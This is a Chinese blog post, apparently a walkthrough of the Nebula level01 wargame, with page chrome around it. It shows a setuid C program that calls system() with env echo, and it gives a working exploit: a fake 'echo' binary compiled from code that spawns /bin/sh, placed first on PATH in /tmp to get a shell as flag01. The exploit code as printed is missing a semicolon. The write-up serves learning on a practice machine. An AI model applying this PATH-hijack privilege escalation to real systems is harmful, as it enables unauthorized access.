Nebula level01

本文详细介绍了如何通过环境变量和系统调用实现从一个用户到另一个用户的权限转移,以获取特定用户(如flag01)的权限,并通过编译和执行特定的C语言程序来实现这一过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
	gid_t gid;
	uid_t uid;
	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	system("/usr/bin/env echo and now what?");
}
使用level01用户名来编译运行(比如可执行程序为flag01)后添加用户名为flag01的可执行位,然后用level01的用户来运行程序,如何获取flag01的用户权限呢?其中有一个getflag的可执行程序,如果获取了对应的权限,那么运行这个getflag会打印出成功获取权限的信息。


首先得明白env这个命令是干什么的,env用来执行当前环境变量下的命令或者显示当前的环境变量。

echo是打印命令。

如果直接运行这个程序肯定会在终端上打印出来 and now what?

要想获得flag01的权限关键是利用system这个执行命令的系统调用。我们这个程序的可执行权限已经是flag01了,也就是它的euid用户是已经是flag01了。

因为echo已经是系统的内置命令了,所以我们无法改变echo的行为,开始时先export echo=getflag,或者别的一些都是不成功的,依然无法改变echo的行为。

因为每个用户在/tmp下面都是具有rwx权限的,所以我们可以在/tmp下面新建一个echo,然后export PATH=/tmp:$PATH, 这样的话执行起来会先去/tmp目录下查找echo这个可执行程序,如果存在则运行。

好的,下面在/tmp目录下新建一个文件test.c:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
      setuid(0);
      setgid(0);
      execl("/bin/sh","sh",(char *)0)
      return 0;
}
然后gcc -o echo test.c

好的,来到我们flag01的目录下运行./flag01, 发现返回了一个shell,输入命令whoami, 发现用户名变成了flag01,运行getflag发现oh,my God!

成功。



评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值